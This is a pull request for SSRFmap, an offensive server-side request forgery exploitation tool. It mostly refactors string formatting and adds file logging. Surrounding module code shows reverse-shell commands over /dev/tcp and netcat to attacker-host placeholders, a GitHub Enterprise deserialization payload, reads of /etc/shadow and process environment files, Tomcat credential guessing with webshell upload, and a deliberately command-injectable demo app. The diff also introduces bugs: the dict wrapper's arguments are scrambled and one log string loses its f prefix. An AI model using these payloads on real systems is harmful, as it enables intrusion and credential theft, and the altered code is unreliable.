### PR TITLE
Added logging to file for better troubleshooting and fixed complicated format calls

### DIFF
--- a/core/handler.py
+++ b/core/handler.py
@@ -7,7 +7,7 @@ class Handler(threading.Thread):
 
     def __init__(self, port):
         threading.Thread.__init__(self)
-        logging.info("Handler listening on 0.0.0.0:{}".format(port))
+        logging.info(f"Handler listening on 0.0.0.0:{port}")
         self.connected = False
         self.port = int(port)
 
@@ -18,12 +18,12 @@ class Handler(threading.Thread):
         while True:
             self.socket.listen(5)
             self.client, address = self.socket.accept()
-            print("Handler> New session from {}".format( address[0] ))
+            print(f"Handler> New session from {address[0]}")
             self.connected = True
 
             response = self.client.recv(255)
             while response != b"":
-                print("\n{}\nShell > $ ".format(response.decode('utf_8', 'ignore').strip()), end='')
+                print(f"\n{response.decode('utf_8', 'ignore').strip()}\nShell > $ ", end='')
                 response = self.client.recv(255)
 
     def listen_command(self):

--- a/core/requester.py
+++ b/core/requester.py
@@ -137,9 +137,9 @@ class Requester(object):
                     verify=False
                 )
         except Exception as e:
+            logging.error(e)
             return None
         return r
-
 
     def __str__(self):
         text =  self.method + " "

--- a/core/ssrf.py
+++ b/core/ssrf.py
@@ -56,10 +56,10 @@ class SSRF(object):
                 self.modules.add(mymodule)
 
     def load_handler(self, name):
-        handler_file = "{}.py".format(name)
+        handler_file = f"{name}.py"
         try:
             location = os.path.join("./handlers", handler_file)
             self.handler = SourceFileLoader(handler_file, location).load_module()
         except Exception as e:
-            logging.error("Invalid no such handler: {}".format(name))
+            logging.error(f"Invalid no such handler: {name}")
             exit(1)

--- a/core/utils.py
+++ b/core/utils.py
@@ -3,24 +3,24 @@ import struct
 import string
 
 def wrapper_file(data):
-    return "file://{}".format(data)
+    return f"file://{data}"
 
 def wrapper_unc(data, ip):
-    return "\\\\{}\\{}".format(ip, data)
+    return f"\\\\{ip}\\{data}"
     
 def wrapper_gopher(data, ip, port):
-    return "gopher://{}:{}/_{}".format(ip, port, data)
+    return f"gopher://{ip}:{port}/_{data}"
 
 def wrapper_dict(data, ip, port):
-    return "dict://{}:{}/{}".format(ip, port, data)
+    return f"dict://{data}:{ip}/{port}"
 
 def wrapper_http(data, ip, port, usernm=False, passwd=False):
     if usernm != False and passwd != False:
-        return "http://{}:{}@{}:{}/{}".format(usernm, passwd, ip, port, data)
-    return "http://{}:{}/{}".format(ip, port, data)
+        return f"http://{usernm}:{passwd}@{ip}:{port}/{data}"
+    return f"http://{ip}:{port}/{data}"
 
 def wrapper_https(data, ip, port):
-    return "https://{}:{}/{}".format(ip, port, data)
+    return f"https://{ip}:{port}/{data}"
 
 
 def diff_text(text1, text2):

--- a/data/example.py
+++ b/data/example.py
@@ -17,7 +17,7 @@ def hello():
 @app.route("/ssrf", methods=['POST'])
 def ssrf():
     data = request.values
-    content = command("curl {}".format(data.get('url')))
+    content = command(f"curl {data.get('url')}")
     return content
 
 # curl -i -H "Content-Type: application/json" -X POST -d '{"url": "http://example.com"}' http://localhost:5000/ssrf2
@@ -26,14 +26,14 @@ def ssrf2():
     data = request.json
     print(data)
     print(data.get('url'))
-    content = command("curl {}".format(data.get('url')))
+    content = command(f"curl {data.get('url')}")
     return content
 
 # curl -v "http://127.0.0.1:5000/ssrf3?url=http://example.com" 
 @app.route("/ssrf3", methods=['GET'])
 def ssrf3():
     data = request.values
-    content = command("curl {}".format(data.get('url')))
+    content = command(f"curl {data.get('url')}")
     return content
 
 # curl -X POST -H "Content-Type: application/xml" -d '<run><log encoding="hexBinary">4142430A</log><result>0</result><url>http://google.com</url></run>' http://127.0.0.1:5000/ssrf4
@@ -44,15 +44,15 @@ def ssrf4():
     regex = re.compile("url>(.*?)</url")
     try:
         url = regex.findall(data.decode())[0]
-        content = command("curl {}".format(url))
+        content = command(f"curl {url}")
         return content
     except Exception as e:
         return e
 
 def command(cmd):
-	proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
-	(out, err) = proc.communicate()
-	return out
+    proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
+    (out, err) = proc.communicate()
+    return out
 
 if __name__ == '__main__':
     app.run(host='127.0.0.1', port=5000, debug=True)

--- a/handlers/http.py
+++ b/handlers/http.py
@@ -23,13 +23,13 @@ class exploit(Handler):
         if self.socket._closed or not response:
             break
 
-        logging.info("New session from : \033[32m{}\033[0m".format( address[0] ))
+        logging.info(f"New session from : \033[32m{address[0]}\033[0m")
         self.connected = True
 
         regex = re.compile('(.*) (.*) HTTP')
         request_method, request_action = regex.findall(response)[0]
         request_param = urllib.parse.urlsplit(request_action).query
-        logging.info("Possible injected param: \033[32m{}\033[0m".format( request_param ))
+        logging.info(f"Possible injected param: \033[32m{request_param}\033[0m")
         self.injected_params.append(request_param)
 
         response_header = "HTTP/1.1 200 OK\n"

--- a/modules/alibaba.py
+++ b/modules/alibaba.py
@@ -11,7 +11,7 @@ class exploit():
     endpoints = set()
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         self.add_endpoints()
 
         r = requester.do_request(args.param, "")
@@ -30,7 +30,7 @@ class exploit():
                 if diff != "":
 
                     # Display diff between default and ssrf request
-                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    logging.info(f"\033[32mReading file\033[0m : {payload}")
                     print(diff)
 
                     # Write diff to a file
@@ -38,7 +38,7 @@ class exploit():
                     if filename == "":
                         filename = endpoint[1].split('/')[-2:-1][0]
 
-                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
                     with open(directory + "/" + filename, 'w') as f:
                         f.write(diff)
 

--- a/modules/aws.py
+++ b/modules/aws.py
@@ -16,7 +16,7 @@ class exploit():
     endpoints = set()
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         self.add_endpoints()
 
         r = requester.do_request(args.param, "")
@@ -35,7 +35,7 @@ class exploit():
                 if diff != "":
 
                     # Display diff between default and ssrf request
-                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    logging.info(f"\033[32mReading file\033[0m : {payload}")
                     print(diff)
 
                     # Write diff to a file
@@ -43,7 +43,7 @@ class exploit():
                     if filename == "":
                         filename = endpoint[1].split('/')[-2:-1][0]
 
-                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
                     with open(directory + "/" + filename, 'w') as f:
                         f.write(diff)
 

--- a/modules/consul.py
+++ b/modules/consul.py
@@ -16,7 +16,7 @@ documentation = [
 class exploit():
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         gen_host = gen_ip_list("127.0.0.1", args.level)
         port = "8500"
 

--- a/modules/custom.py
+++ b/modules/custom.py
@@ -13,7 +13,7 @@ class exploit():
     SERVICE_DATA = "/bin/nc 127.0.0.1 4444 -e /bin/sh &"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         gen_hosts = gen_ip_list("127.0.0.1", args.level)
         self.SERVICE_PORT = input("Service Port: ")
         self.SERVICE_DATA = "%0d%0a"+urllib.parse.quote(input("Service Data: "))
@@ -22,9 +22,9 @@ class exploit():
             payload = wrapper_gopher(self.SERVICE_DATA, gen_host, self.SERVICE_PORT)
             
             if args.verbose == True:
-                logging.info("Generated payload : {}".format(payload))
+                logging.info(f"Generated payload : {payload}")
 
             r = requester.do_request(args.param, payload)
 
             if args.verbose == True:
-                logging.info("Module '{}' ended !".format(name))
+                logging.info(f"Module '{name}' ended !")

--- a/modules/digitalocean.py
+++ b/modules/digitalocean.py
@@ -11,7 +11,7 @@ class exploit():
     endpoints = set()
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         self.add_endpoints()
 
         r = requester.do_request(args.param, "")
@@ -30,12 +30,12 @@ class exploit():
                 if diff != "":
 
                     # Display diff between default and ssrf request
-                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    logging.info(f"\033[32mReading file\033[0m : {payload}")
                     print(diff)
 
                     # Write diff to a file
                     filename = endpoint[1].split('/')[-1]
-                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
                     with open(directory + "/" + filename, 'w') as f:
                         f.write(diff)
 

--- a/modules/docker.py
+++ b/modules/docker.py
@@ -15,7 +15,7 @@ documentation = []
 class exploit():
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         gen_host = gen_ip_list("127.0.0.1", args.level)
         port = "2375"
 
@@ -33,9 +33,9 @@ class exploit():
                     container_command = container['Command']
 
                     logging.info("Found docker container")
-                    logging.info("\033[32mId\033[0m : {}".format(container_id))
-                    logging.info("\033[32mName\033[0m : {}".format(container_name))
-                    logging.info("\033[32mCommand\033[0m : {}\n".format(container_command))
+                    logging.info(f"\033[32mId\033[0m : {container_id}")
+                    logging.info(f"\033[32mName\033[0m : {container_name}")
+                    logging.info(f"\033[32mCommand\033[0m : {container_command}\n")
 
             # Step 2 - Extract id and name from each image 
             data = "images/json"
@@ -48,7 +48,7 @@ class exploit():
                     container_id      = container['Id']
                     container_name    = container['RepoTags'][0].replace('/','')
 
-                    logging.info("Found docker image n°{}".format(index))
-                    logging.info("\033[32mId\033[0m : {}".format(container_id))
-                    logging.info("\033[32mName\033[0m : {}\n".format(container_name))
+                    logging.info(f"Found docker image n°{index}")
+                    logging.info(f"\033[32mId\033[0m : {container_id}")
+                    logging.info(f"\033[32mName\033[0m : {container_name}\n")
                     images[container_name] = container_id

--- a/modules/fastcgi.py
+++ b/modules/fastcgi.py
@@ -11,7 +11,7 @@ class exploit():
     SERVER_PORT = "4242"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # Handle args for reverse shell
         if args.lhost == None: self.SERVER_HOST = input("Server Host:")

--- a/modules/gce.py
+++ b/modules/gce.py
@@ -15,7 +15,7 @@ class exploit():
     endpoints = set()
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         self.add_endpoints()
 
         r = requester.do_request(args.param, "")
@@ -34,7 +34,7 @@ class exploit():
                 if diff != "":
 
                     # Display diff between default and ssrf request
-                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    logging.info(f"\033[32mReading file\033[0m : {payload}")
                     print(diff)
 
                     # Write diff to a file
@@ -42,7 +42,7 @@ class exploit():
                     if filename == "":
                         filename = endpoint[1].split('/')[-2:-1][0]
 
-                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    logging.info(f"\033[32mWriting file\033[0m : {payload} to {directory + '/' + filename}")
                     with open(directory + "/" + filename, 'w') as f:
                         f.write(diff)
 

--- a/modules/github.py
+++ b/modules/github.py
@@ -13,7 +13,7 @@ documentation = [
 class exploit():
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # Data for the service
         ip   = "0"
@@ -22,7 +22,7 @@ class exploit():
     
         cmd = "id | nc SERVER_HOST SERVER_PORT"
         # cmd = "nc SERVER_HOST SERVER_PORT -e /bin/sh"
-        marshal_code = '\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'.format(cmd)
+        marshal_code = f'\x04\x08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\x07:\x0e@instanceo:\x08ERB\x07:\t@srcI"\x1e`{cmd}`\x06:\x06ET:\x0c@linenoi\x00:\x0c@method:\x0bresult'
         payload = [
             '',
             'set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 %d' % len(marshal_code),
@@ -43,4 +43,4 @@ class exploit():
 
         logging.info("You need to insert the WebHooks in 'https://ghe-server/:user/:repo/settings/hooks'")
         logging.info("Then make a request to 'https://ghe-server/search?q=ggggg&type=Repositories'")
-        logging.info('Payload : {}'.format(payload))
+        logging.info(f"Payload : {payload}")

--- a/modules/httpcollaborator.py
+++ b/modules/httpcollaborator.py
@@ -25,7 +25,7 @@ class exploit():
     SERVER_PORT = "4242"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # Handle args for httpcollaborator
         if args.lhost == None: self.SERVER_HOST = input("Server Host:")
@@ -36,8 +36,8 @@ class exploit():
 
         params = args.param.split(",")
         for param in params:
-            logging.info("Testing PARAM: {}".format(param))
-            payload = wrapper_http("?{}".format(param), args.lhost, args.lport.strip() )
+            logging.info(f"Testing PARAM: {param}")
+            payload = wrapper_http(f"?{param}", args.lhost, args.lport.strip() )
             r = requester.do_request(param, payload)
 
-        logging.info("Module '{}' finished !".format(name))
+        logging.info(f"Module '{name}' finished !")

--- a/modules/memcache.py
+++ b/modules/memcache.py
@@ -13,12 +13,12 @@ class exploit():
     SERVICE_DATA = "\r\n"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         gen_host = gen_ip_list("127.0.0.1", args.level)
         payload = input("Data to store: ")
 
-        self.SERVICE_DATA += 'set payloadname 0 0 {}\r\n'.format(len(payload))
-        self.SERVICE_DATA += '{}\r\n'.format(payload)
+        self.SERVICE_DATA += f'set payloadname 0 0 {len(payload)}\r\n'
+        self.SERVICE_DATA += f'{payload}\r\n'
         self.SERVICE_DATA += 'quit\r\n'
         self.SERVICE_DATA = urllib.parse.quote(self.SERVICE_DATA)
 
@@ -26,9 +26,9 @@ class exploit():
             payload = wrapper_gopher(self.SERVICE_DATA, self.SERVICE_IP, self.SERVICE_PORT)
 
             if args.verbose == True:
-                logging.info("Generated payload : {}".format(payload))
+                logging.info(f"Generated payload : {payload}")
 
             r = requester.do_request(args.param, payload)
 
             if args.verbose == True:
-                logging.info("Module '{}' ended !".format(name))
+                logging.info("Module '{name}' ended !")

--- a/modules/mysql.py
+++ b/modules/mysql.py
@@ -23,14 +23,14 @@ class exploit():
 
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # Encode the username for the request
         self.user = input("Give MySQL username: ")
         encode_user = binascii.hexlify( self.user.encode() )
         user_length = len(self.user)
         temp   = user_length - 4
-        length = '{:x}'.format(0xa3 + temp)
+        length = f'{(0xa3 + temp):x}'
 
         # Authenticate to MySQL service - only work with users allowed without password
         dump  = length+ "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
@@ -67,7 +67,7 @@ class exploit():
         gen_host = gen_ip_list("127.0.0.1", args.level)
         for ip in gen_host:
             payload = self.get_payload(self.query, auth, ip)
-            logging.info("Generated payload : {}".format(payload))
+            logging.info(f"Generated payload : {payload}")
 
             r1 = requester.do_request(args.param, payload)
             r2 = requester.do_request(args.param, "")
@@ -83,10 +83,10 @@ class exploit():
 
     def get_payload(self, query, auth, ip):
         if(query.strip()!=''):
-        	query = binascii.hexlify( query.encode() )
-        	query_length = '{:x}'.format((int((len(query) / 2) + 1)))
-        	pay1 = query_length.rjust(2,'0') + "00000003" + query.decode()
-        	final = self.encode(auth + pay1 + "0100000001", ip)
-        	return final
+            query = binascii.hexlify( query.encode() )
+            query_length = f'{(int((len(query) / 2) + 1)):x}'
+            pay1 = query_length.rjust(2,'0') + "00000003" + query.decode()
+            final = self.encode(auth + pay1 + "0100000001", ip)
+            return final
         else:
-    	    return self.encode(auth, ip)
+            return self.encode(auth, ip)

--- a/modules/networkscan.py
+++ b/modules/networkscan.py
@@ -13,7 +13,7 @@ class exploit():
     ips = set()
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # concurrent requests in order to limit the time
         self.add_range("192.168.1.0/24")  # Default network 
@@ -50,7 +50,7 @@ class exploit():
         
             if (not "Connection refused" in r.text) and (r.text != compare.text):
                 timer = datetime.today().time().replace(microsecond=0)
-                print("\t[{}] Found host :{}".format(timer, host+ " "*40))
+                print(f"\t[{timer}] Found host :{host+ ' '*40}")
 
             timer = datetime.today().time().replace(microsecond=0)
         except Exception as e:

--- a/modules/portscan.py
+++ b/modules/portscan.py
@@ -11,7 +11,7 @@ documentation = []
 class exploit():
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         r = requester.do_request(args.param, "")
 
         load_ports = ""
@@ -38,18 +38,18 @@ class exploit():
 
                 # Check if the request is the same
                 if r.text != '' and r.text != compare.text:
-                    print("\t[{}] IP:{:12s}, Found \033[32mopen     \033[0m port n°{}".format(timer, host, port))
+                    print(f"\t[{timer}] IP:{host:12s}, Found \033[32mopen     \033[0m port n°{port}")
                 else:
-                    print("\t[{}] IP:{:12s}, Found \033[31mfiltered\033[0m  port n°{}".format(timer, host, port))
+                    print(f"\t[{timer}] IP:{host:12s}, Found \033[31mfiltered\033[0m  port n°{port}")
 
             timer = datetime.today().time().replace(microsecond=0)
             port = port.strip() + " "*20
-            print("\t[{}] Checking port n°{}".format(timer, port), end='\r'),
+            print(f"\t[{timer}] Checking port n°{port}", end='\r'),
         
         # Timeout is a potential port
         except Exception as e:
             print(e)
             timer = datetime.today().time().replace(microsecond=0)
             port = port.strip() + " "*20
-            print("\t[{}] IP:{:212}, \033[33mTimed out\033[0m  port n°{}".format(timer, host, port))
+            print(f"\t[{timer}] IP:{host:212}, \033[33mTimed out\033[0m  port n°{port}")
             pass

--- a/modules/readfiles.py
+++ b/modules/readfiles.py
@@ -11,7 +11,7 @@ documentation = []
 class exploit():
     
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         self.files = args.targetfiles.split(',') if args.targetfiles != None else ["/etc/passwd", "/etc/lsb-release", "/etc/shadow", "/etc/hosts", "\/\/etc/passwd", "/proc/self/environ", "/proc/self/cmdline", "/proc/self/cwd/index.php", "/proc/self/cwd/application.py", "/proc/self/cwd/main.py", "/proc/self/exe"]   
         
         r = requester.do_request(args.param, "")
@@ -30,12 +30,12 @@ class exploit():
                 if diff != "":
 
                     # Display diff between default and ssrf request
-                    logging.info("\033[32mReading file\033[0m : {}".format(f))
+                    logging.info(f"\033[32mReading file\033[0m : {f}")
                     print(diff)
 
                     # Write diff to a file
                     filename = f.replace('\\','_').replace('/','_')
-                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(f, directory + "/" + filename))
+                    logging.info(f"\033[32mWriting file\033[0m : {f} to {directory + '/' + filename}")
                     with open(directory + "/" + filename, 'w') as f:
                         f.write(diff)
 

--- a/modules/redis.py
+++ b/modules/redis.py
@@ -15,7 +15,7 @@ class exploit():
     SERVER_CRON = "/var/lib/redis"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # Handle args for reverse shell
         if args.lhost == None: self.SERVER_HOST = input("Server Host:")
@@ -46,13 +46,13 @@ class exploit():
             payload = payload.replace("LENGTH_PAYLOAD", str(self.LENGTH_PAYLOAD))
 
             if args.verbose == True:
-                logging.info("Generated payload : {}".format(payload))
+                logging.info(f"Generated payload : {payload}")
                 
             # Send the payload
             r = requester.do_request(args.param, payload)
 
             if args.verbose == True:
-                logging.info("Module '{}' ended !".format(name))
+                logging.info(f"Module '{name}' ended !")
 
 """
 TODO:

--- a/modules/smbhash.py
+++ b/modules/smbhash.py
@@ -15,7 +15,7 @@ class exploit():
     UNC_FILE    = "SSRFmap"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         UNC_IP   = input("UNC IP (default: 192.168.1.2): ")
         if UNC_IP != '':
@@ -27,4 +27,4 @@ class exploit():
         
         payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)
         r = requester.do_request(args.param, payload)
-        logging.info("\033[32mSending UNC Path\033[0m : {}".format(payload))
+        logging.info(f"\033[32mSending UNC Path\033[0m : {payload}")

--- a/modules/smtp.py
+++ b/modules/smtp.py
@@ -15,6 +15,7 @@ class exploit():
 
 
     def __init__(self, requester, args):
+        logging.info(f"Module '{name}' launched !")
         self.mailto = input("[MAILTO] Give a mail (e.g: hacker@example.com): ")
 
         gen_host = gen_ip_list("127.0.0.1", args.level)

--- a/modules/socksproxy.py
+++ b/modules/socksproxy.py
@@ -30,11 +30,11 @@ class exploit():
     TIMEOUT     = 5
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         server.bind((self.HOST, self.PORT))
         server.listen(2)
-        logging.info("Listener ready on port {}".format(self.PORT))
+        logging.info(f"Listener ready on port {self.PORT}")
         try:
             while 1:
                 client, addr = server.accept()

--- a/modules/template.py
+++ b/modules/template.py
@@ -11,7 +11,7 @@ class exploit():
     SERVER_PORT = "4242"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         # Handle args for reverse shell
         if args.lhost == None: self.SERVER_HOST = input("Server Host:")

--- a/modules/tomcat.py
+++ b/modules/tomcat.py
@@ -36,7 +36,7 @@ class exploit():
     tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"]
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
         self.args = args
 
         # Using a generator to create the host list
@@ -48,7 +48,7 @@ class exploit():
                     r = requester.do_request(args.param, payload)
 
                     if r != None and not "s3cret" in r.text:
-                        logging.info("Found credential \033[32m{}\033[0m:\033[32m{}\033[0m".format(usr, pss))
+                        logging.info(f"Found credential \033[32m{usr}\033[0m:\033[32m{pss}\033[0m")
                         self.SERVER_USER = usr
                         self.SERVER_PASS = pss
 
@@ -61,9 +61,9 @@ class exploit():
                             r = requester.do_request(args.param, payload)
                             
                             if args.verbose == True:
-                                logging.info("Generated payload : {}".format(payload))
+                                logging.info(f"Generated payload : {payload}")
 
-                            logging.info("Sending CMD to cmd.jsp for padding: {}".format(i))
+                            logging.info(f"Sending CMD to cmd.jsp for padding: {i}")
                             payload = wrapper_http("cmd/cmd.jsp?cmd=whoami", self.SERVER_HOST, self.SERVER_PORT)
                             r = requester.do_request(args.param, payload)
                             if r.text != None and r.text != "":
@@ -101,12 +101,12 @@ class exploit():
         modded_length=0
         
         if self.args.verbose == True:
-            logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8)))
-            logging.info("Original file crc32: {}".format(format(binascii.crc32(webshell_data.encode())& 0xffffffff, 'x')))
+            logging.info(f"Original file length: {len(webshell_data):08X}")
+            logging.info(f"Original file crc32: {binascii.crc32(webshell_data.encode())& 0xffffffff:x}")
         
         while valid_length == 0 or valid_crc32 == 0:
-            crc_string = format(binascii.crc32(webshell_data.encode())& 0xffffffff, 'x')
-            ws_len_byte_string = '{0:0{1}X}'.format(len(webshell_data),8)
+            crc_string = f"{binascii.crc32(webshell_data.encode())& 0xffffffff:x}"
+            ws_len_byte_string = f"{len(webshell_data):08X}"
             valid_length=1
             valid_crc32=1
             lead_byte_locations = [0,2,4,6]
@@ -123,13 +123,13 @@ class exploit():
         if modded_length > 0:
             logging.info("The input file CRC32 or file length contained an invalid byte.")
             logging.info("Length adjustment completed. " + str(modded_length) + " whitespace ' ' chars were added to the webshell input.")
-            logging.info("New file length: " +'{0:0{1}X}'.format(len(webshell_data),8))
-            logging.info("New file crc32: " + format(binascii.crc32(webshell_data.encode())& 0xffffffff, 'x'))
+            logging.info(f"New file length: {len(webshell_data):08X}")
+            logging.info(f"New file crc32: {binascii.crc32(webshell_data.encode())& 0xffffffff:x}")
         return webshell_data
 
     def url_encode_all(self, string):
-        return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
-        
+        return "".join([f"%{ord(char):0>2x}" for char in string])
+
     def build_gopher_payload(self):
         warfile = ""
         with open(self.EXPLOIT_WAR, 'rb') as f:

--- a/modules/zabbix.py
+++ b/modules/zabbix.py
@@ -14,7 +14,7 @@ class exploit():
     cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
 
     def __init__(self, requester, args):
-        logging.info("Module '{}' launched !".format(name))
+        logging.info(f"Module '{name}' launched !")
 
         cmd = input("Give command to execute (Enter for Reverse Shell): ")
         if cmd == "":
@@ -41,7 +41,7 @@ class exploit():
             data = "system.run[(" + self.cmd + ");sleep 2s]"
             
             payload = wrapper_gopher(data, ip , port)
-            logging.info("Generated payload : {}".format(payload))
+            logging.info(f"Generated payload : {payload}")
 
             # Send the payload
             r = requester.do_request(args.param, payload)

--- a/ssrfmap.py
+++ b/ssrfmap.py
@@ -1,11 +1,9 @@
 #!/usr/bin/python
-from datetime import datetime
 from core.ssrf import SSRF
-import requests
 import argparse
 import logging
 import urllib3
-import re
+
 
 def display_banner():
     print(" _____ _________________                     ") 
@@ -50,7 +48,15 @@ if __name__ == "__main__":
     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
     # enable custom logging
-    logging.basicConfig(level=logging.INFO, format='[%(levelname)s]:%(message)s')
+    logging.basicConfig(
+        level=logging.INFO,
+        format="[%(levelname)s]:%(message)s",
+        handlers=[
+            logging.FileHandler("SSRFmap.log", mode='w'),
+            logging.StreamHandler()
+        ]
+    )
+
     logging.addLevelName( logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
     logging.addLevelName( logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
     display_banner()


### PR DESCRIPTION
- Added logging to file for better troubleshooting, preserved original format `[%(levelname)s]:%(message)s`

- Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted:
    - `"".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)` => `"".join([f"%{ord(char):0>2x}" for char in string])`
    - `logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8)))` => `logging.info(f"Original file length: {len(webshell_data):08X}")`
   
- Added missing 'module launched' message for SMTP